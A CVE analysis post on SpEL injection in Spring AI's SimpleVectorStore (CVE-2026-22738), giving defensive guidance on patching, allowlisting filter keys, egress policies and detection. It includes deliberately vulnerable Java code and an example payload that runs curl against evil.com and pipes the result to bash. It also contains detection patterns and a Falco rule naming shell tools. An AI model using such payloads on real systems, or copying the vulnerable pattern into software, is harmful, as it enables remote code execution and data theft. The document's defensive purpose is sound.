CVE-2026-22738: Spring AI SpEL Injection in SimpleVectorStore - REFLEX Analysis

cve-analysis
Published

March 30, 2026

CVE Overview

  • CVE ID: CVE-2026-22738
  • Component/Software: Spring AI — SimpleVectorStore
  • 🚨 Vulnerable Versions: 1.0.0 through 1.0.4 and 1.1.0 through 1.1.3
  • Severity: 9.8 CRITICAL (CVSS 3.1)
  • Impact: Remote code execution via SpEL injection in filter expression keys
  • Date: March 27, 2026
  • ✅ Safe Version: Upgrade to Spring AI 1.0.5 or later (1.0.x line) or 1.1.4 or later (1.1.x line)
ImportantHeroDevs Never-Ending Support (NES)

Organizations running legacy applications that cannot easily upgrade can leverage HeroDevs Never-Ending Support for continued security patches and guidance on legacy Spring AI versions. HeroDevs provides full NES coverage for Spring AI 1.0 and 1.1 as part of their Spring Boot 3.5 portfolio — critical for teams facing the June 2026 end-of-life deadline.

The AI vulnerability nobody saw coming. While the industry focused on prompt injection and model poisoning, this CVE proved that classical injection attacks are alive and well in the AI ecosystem — hiding inside the vector store that powers your RAG pipeline.

An attacker named “Kael” has been watching Spring AI’s growing adoption among enterprise teams building retrieval-augmented generation systems. When CVE-2026-22738 drops on March 27th, he’s ready. He scans GitHub for Spring AI applications that expose search endpoints — and finds a healthcare startup’s patient knowledge base built on SimpleVectorStore. Kael crafts a search request with a malicious filter key containing a SpEL expression: instead of filtering documents, the expression executes arbitrary code inside the JVM. Within seconds, Kael has a reverse shell on the production server, with full access to patient records and cloud credentials stored in environment variables.


REFLEX Analysis

🔍 Reconnaissance

From an attacker’s perspective:

Attackers hunting for CVE-2026-22738 have a surprisingly easy time identifying targets. Spring AI is still young enough that most applications using it are greenfield projects built in the last 12–18 months, and their developers tend to be enthusiastic about sharing their work. Conference talks, blog posts, and GitHub repositories describing “building RAG with Spring AI” provide a roadmap to targets.

The first signal is dependency discovery. Public pom.xml or build.gradle files on GitHub containing spring-ai-core or spring-ai-starter immediately flag an application as potentially vulnerable. Attackers can refine this by searching for SimpleVectorStore specifically — the vulnerable component — since many teams use it for prototyping before moving to a production vector database like Pgvector or Milvus. What makes this dangerous is that “prototype” code has a habit of reaching production.

Beyond source code, attackers can fingerprint Spring AI applications through their behaviour. Endpoints that accept filter parameters alongside semantic search queries — common patterns like /api/search?query=...&filter=... — suggest a vector store with filtering enabled. Error messages from failed SpEL parsing can confirm the technology stack and reveal version information.

Supply chain mapping is also productive. Spring AI’s transitive dependency graph pulls in Spring Boot, Spring Expression Language, and the AI model client libraries. Teams focused on getting their RAG pipeline working may never audit the filter expression handling path — it’s a utility feature they configured once and forgot about.

Developer insight: The features you configure once and forget about are exactly the features attackers study most carefully.

📊 Evaluate

Vulnerability assessment:

CVE-2026-22738 is exploitable when three conditions align: the application uses SimpleVectorStore (not an external vector database), user-controllable input reaches a filter expression key, and the application runs a vulnerable version (1.0.0–1.0.4 or 1.1.0–1.1.3). The critical word is “key” — not the filter value, but the field name itself.

The technical root cause is a classic injection flaw adapted for a modern context. SimpleVectorStore evaluates filter expressions using Spring Expression Language (SpEL) to match documents against criteria. When building these expressions, the filter key — the field name being filtered on — is interpolated directly into a SpEL expression string without sanitization. An attacker who controls the key can break out of the intended expression and inject arbitrary SpEL code.

Here’s the vulnerable pattern:

// VULNERABLE — user input used directly as filter key
@GetMapping("/search")
public List<Document> search(
    @RequestParam String query,
    @RequestParam String filterField,  // attacker controls this
    @RequestParam String filterValue) {

    FilterExpression filter = new FilterExpression(
        FilterExpression.ExpressionType.EQ,
        new FilterExpression.Key(filterField),   // SpEL injection point
        new FilterExpression.Value(filterValue)
    );

    return vectorStore.similaritySearch(
        SearchRequest.query(query).withFilterExpression(filter)
    );
}

An attacker can submit a filterField like T(java.lang.Runtime).getRuntime().exec('curl http://evil.com/shell.sh|bash') — and instead of filtering documents, the server executes arbitrary system commands.

Assessment is complicated by how Spring AI is typically adopted. It’s a framework for building AI-powered features, not a standalone application. This means the vulnerability lives inside custom code that varies per project. Automated scanners can flag the vulnerable library version, but confirming exploitability requires understanding how each application passes user input to the vector store’s filter API.

Developer insight: Injection vulnerabilities don’t retire — they just find new frameworks to hide in. If you’re interpolating user input into any expression language, you have an injection risk.

🛡️ Fortify

Prevention and hardening:

Upgrade immediately. Update to Spring AI 1.0.5 (for the 1.0.x line) or Spring AI 1.1.4 (for the 1.1.x line). The fix adds proper escaping and validation of filter expression keys before SpEL evaluation. This is the only complete remediation.

If you cannot upgrade immediately, apply these mitigations in order of effectiveness:

  1. Allowlist filter keys: Never accept arbitrary user input as a filter field name. Map user input to a fixed set of permitted fields:
// SECURE — allowlisted filter keys
private static final Set<String> ALLOWED_FILTER_KEYS =
    Set.of("category", "author", "date", "status", "department");

@GetMapping("/search")
public List<Document> search(
    @RequestParam String query,
    @RequestParam String filterField,
    @RequestParam String filterValue) {

    // BAD: using filterField directly
    // GOOD: validate against allowlist
    if (!ALLOWED_FILTER_KEYS.contains(filterField)) {
        throw new IllegalArgumentException(
            "Invalid filter field: " + filterField);
    }

    FilterExpression filter = new FilterExpression(
        FilterExpression.ExpressionType.EQ,
        new FilterExpression.Key(filterField),
        new FilterExpression.Value(filterValue)
    );

    return vectorStore.similaritySearch(
        SearchRequest.query(query).withFilterExpression(filter)
    );
}
  1. Remove user-facing filter parameters: If your application doesn’t need user-controlled filter fields, don’t expose them. Hardcode the filter keys in your backend and only accept values from the frontend.

  2. Deploy a WAF rule: Add a web application firewall rule to detect SpEL injection patterns in request parameters. Look for T(, Runtime, exec(, and ProcessBuilder in query strings and request bodies.

  3. Restrict JVM permissions: Run your application under a Java Security Manager or container security context that limits what Runtime.exec() and reflection can do, reducing the impact even if injection occurs.

Long-term fortification: Pin your Spring AI version in pom.xml or build.gradle to the patched version. Enable Dependabot or Renovate to alert on future Spring AI security updates. Add a security scanning step in CI/CD that fails the build on critical CVEs.

Developer insight: An allowlist of permitted field names is three lines of code. A breach response is three months of work. The maths is not complicated.

⚡ Limit

Damage containment:

Even with the best patching cadence, assume that exploitation could happen before you upgrade. The question is: how much damage can an attacker do once they have code execution inside your JVM?

Network segmentation is the single most effective containment measure. If your Spring AI application can only reach its configured AI model API and database — with all other outbound traffic blocked — an attacker who achieves code execution cannot easily exfiltrate data or establish a reverse shell. This alone would have stopped the scenario described above.

# Kubernetes NetworkPolicy — restrict egress from the AI service
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: spring-ai-service-egress
spec:
  podSelector:
    matchLabels:
      app: ai-search-service
  policyTypes:
    - Egress
  egress:
    - to:
        - podSelector:
            matchLabels:
              app: postgres-vectorstore
      ports:
        - protocol: TCP
          port: 5432
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
      ports:
        - protocol: TCP
          port: 443  # AI model API only — consider IP-restricting further
    # No unrestricted outbound access

Least privilege compounds the benefit. The service account running your Spring AI application should have read-only access to the vector store and no access to secrets, credential stores, or other services beyond what it strictly needs. In AWS, use IAM roles scoped to the specific resources the application needs. In Kubernetes, use ServiceAccounts with minimal RBAC bindings.

Container isolation adds another layer. Run the application in a non-root container with a read-only root filesystem. If an attacker achieves code execution but can’t write to disk or escalate privileges, their options narrow considerably.

Micro-service boundaries matter too. If your vector search is a separate service from your core application, a compromise is contained to that service. The attacker doesn’t automatically get access to your user database, payment systems, or admin interfaces.

Developer insight: Code execution is the beginning of an attack, not the end. Every architectural boundary between the compromised service and your crown jewels is time you’ve bought for your incident response team.

👁️ Expose

Detection and visibility:

SpEL injection attempts leave distinctive traces if you know where to look. The attack payload contains Java class references and method calls that look nothing like legitimate filter field names.

HTTP request monitoring is your first line of detection. Legitimate filter keys are short, alphanumeric strings like category or author. Attack payloads contain patterns like T(java.lang, Runtime, getRuntime(), exec(, and ProcessBuilder. Set up WAF or application-level rules to flag these:

# Detect SpEL injection attempts in application access logs
grep -E "(T\(java|getRuntime|ProcessBuilder|exec\(|\.class\.)" /var/log/app/access.log

# Real-time monitoring with tcpdump for network-level detection
tcpdump -A -i any 'port 8080' | grep -E 'T%28java|getRuntime|exec%28'

Application-level logging should capture filter expressions before they’re evaluated. Add structured logging around your vector store search calls:

logger.info("Vector search request",
    Map.of(
        "userId", authenticatedUser.getId(),
        "query", query.substring(0, Math.min(query.length(), 100)),
        "filterKey", filterField,
        "sourceIp", request.getRemoteAddr()
    ));

Runtime behavioural monitoring catches successful exploitation. Tools like Falco or Tetragon can detect when a Java process spawns unexpected child processes (shell commands), makes unusual network connections, or reads sensitive files:

# Falco rule — detect shell execution from Java process
- rule: Shell spawned by Java
  desc: Detect shell spawned from a Java/Spring application
  condition: >
    spawned_process and
    proc.pname = "java" and
    proc.name in (bash, sh, curl, wget, nc, python)
  output: >
    Shell spawned from Java process
    (user=%user.name command=%proc.cmdline parent=%proc.pname
     container=%container.name image=%container.image.repository)
  priority: CRITICAL

Post-exploitation indicators to monitor: unexpected outbound DNS queries (especially base64-encoded subdomains used for data exfiltration), new network connections to IP addresses not in your allowlist, and sudden spikes in CPU or memory usage from the application process.

Developer insight: You can’t detect what you don’t log. Structured logging around your AI pipeline’s input processing is cheap insurance against a class of attacks that will only grow as AI frameworks mature.

💪 Exercise

Practice and preparedness:

Dependency audit drill: Can your team identify every application using Spring AI in under 10 minutes? Run this now:

# Find all projects using Spring AI in your organisation's repos
# Maven projects
find /path/to/repos -name "pom.xml" -exec grep -l "spring-ai" {} \;

# Gradle projects
find /path/to/repos -name "build.gradle*" -exec grep -l "spring-ai" {} \;

# Check specific version
mvn dependency:tree -Dincludes=org.springframework.ai

Code review exercise: Search your codebases for the vulnerable pattern — user input reaching filter expression keys. This is a focused, time-boxed exercise that builds familiarity with the attack surface:

# Find potential SpEL injection points
grep -rn "FilterExpression\|withFilterExpression\|similaritySearch" \
  --include="*.java" /path/to/project

Team preparedness checklist:

  • Can you generate a complete dependency tree for all Spring AI applications in under 5 minutes?
  • Do your CI/CD pipelines fail on critical CVEs before code reaches production?
  • Is there an allowlist of permitted filter keys in every endpoint that accepts filter parameters?
  • Can you deploy a patched version of your AI search service within 4 hours of a CVE disclosure?
  • Do you have egress network policies restricting outbound connections from your AI services?
  • Are filter expression inputs logged with enough context for forensic analysis?
  • Has your team practiced an incident response scenario specific to code execution in an AI service?

Tabletop scenarios:

  • Zero-day in your vector store: Spring AI discloses a new critical CVE on a Friday afternoon. Your team has to assess exposure, apply mitigations, and communicate with stakeholders. Walk through: who does what, in what order, and how long does each step take?
  • Supply chain escalation: An attacker compromises your Spring AI application and uses it as a beachhead to reach your model API keys. How far can they get before your monitoring detects it? What secrets are accessible from that service?
  • Regulatory pressure: A regulator asks you to demonstrate that your AI-powered search system is protected against injection attacks. What evidence can you produce, and how quickly?

Developer insight: The AI security landscape is moving fast, but injection attacks are as old as web applications. The teams that practise responding to classical vulnerabilities in their AI stack will be the ones that survive the novel attacks too.


Key Takeaways for Developers

Most important lesson: “AI frameworks inherit every vulnerability class that traditional frameworks have — plus new ones. SpEL injection in a vector store is just SQL injection wearing a different hat.”

🚨 CRITICAL: Upgrade to Spring AI 1.0.5+ or 1.1.4+ immediately — this is the only complete fix for CVE-2026-22738.

Immediate actions:

  1. 🚨 UPGRADE NOW: Update to Spring AI 1.0.5 (1.0.x line) or 1.1.4 (1.1.x line) across all applications
  2. Audit filter usage: Search every codebase for FilterExpression, withFilterExpression, and similaritySearch — identify where user input reaches filter keys
  3. Implement allowlists: Add input validation that restricts filter field names to a fixed set of permitted values
  4. Add WAF rules: Deploy web application firewall rules to detect SpEL injection patterns (T(java, getRuntime, exec()
  5. Restrict network egress: Apply Kubernetes NetworkPolicies or security group rules to limit outbound traffic from AI services
  6. Enable dependency scanning: Add Dependabot, Snyk, or OWASP Dependency-Check to your CI/CD pipeline if not already present

Long-term practices:

  • Treat AI frameworks like any other attack surface: Apply the same security review rigour to your RAG pipeline as you would to your authentication system
  • Pin and audit AI dependencies: Spring AI is evolving rapidly — pinned versions and automated security scanning prevent surprise vulnerabilities
  • Isolate AI services architecturally: Run vector search behind network policies with minimal privileges and no direct access to sensitive data stores
  • Log AI pipeline inputs structurally: Every query and filter parameter should be logged with user context for forensic analysis

Related patterns: This vulnerability demonstrates classic Java and Maven/Gradle dependency risks, LLM tooling misuse concerns, and prompt injection patterns covered in our battlecards.


References